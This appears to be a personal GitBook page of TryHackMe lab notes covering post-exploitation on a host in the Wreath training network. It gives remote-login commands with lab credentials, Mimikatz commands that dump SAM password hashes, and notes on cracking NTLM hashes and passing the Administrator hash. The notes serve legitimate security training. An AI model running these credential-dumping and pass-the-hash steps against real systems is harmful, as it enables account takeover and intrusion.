Try Hack Me
LinkedIn
  • Try Hack Me
    • Networks
      • Wreath
        • Recon
        • Enumeration
          • 80,443
          • 10000
        • Foothold [prod-serv]
        • Pivoting
          • 10.200.101.150 [git-serv]
            • Pivoting
            • Post Exploitation
            • C2
          • 10.200.101.100
            • Pivoting
            • Enumeration
            • Code Analysis
            • Exploit
            • Priv Esc
            • Exfil
    • Machines
      • Steel Mountain
        • Recon
          • nmap
        • Enumeration
          • 8080
          • 80
          • 445
          • enum4linux
        • Foothold
        • Enumeration
        • Priv Esc
      • Alfred
        • Recon
          • nmap
        • Enumeration
          • 80
          • 8080
        • Foothold
          • Enumeration
        • Priv Esc
        • usernames
      • Lazy Admin
        • Recon
          • nmap
        • Enumeration
          • 80, 443
          • 21
        • Foothold
          • Enumeration
        • Priv Esc
        • Notes
      • Anonymous
        • Recon
          • nmap
        • Enumeration
          • 21
          • 445
        • Foothold
          • Enumeration
        • Priv Esc
        • Notes
      • Tomghost
        • Recon
          • nmap
        • Enumeration
          • 8080
          • 21
        • Foothold
        • Priv Esc
        • Notes
      • ConvertMyVideo
        • Recon
          • nmap
        • Enumeration
          • 80, 443
          • 22
        • Foothold
        • Priv Esc
        • Notes
  • Template
    • Recon
      • nmap
    • Enumeration
      • 80, 443
      • 21
    • Foothold
    • Priv Esc
    • Notes
Powered by GitBook
On this page
  • Stabilization and Persistence
  • Mimikatz
  1. Try Hack Me
  2. Networks
  3. Wreath
  4. Pivoting
  5. 10.200.101.150 [git-serv]

Post Exploitation

PreviousPivotingNextC2

Stabilization and Persistence

evil-winrm -u adot8 -p password1 -i 10.200.101.150

OR RDP

xfreerdp /u:adot8 /p:password1 /v:10.200.101.150 +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share

/drive creates a shared drive between you and the machine. Access in file explorer with \\tsclient

Mimikatz

Run Mimikatz as Administrator

privilege::debug
token::elevate
log c:\windows\temp\sam.log
lsadump::sam

Use crackstation to crack Thomas's and Arheo5's NTLM hashes

Pass Administrators hash in evil-winrm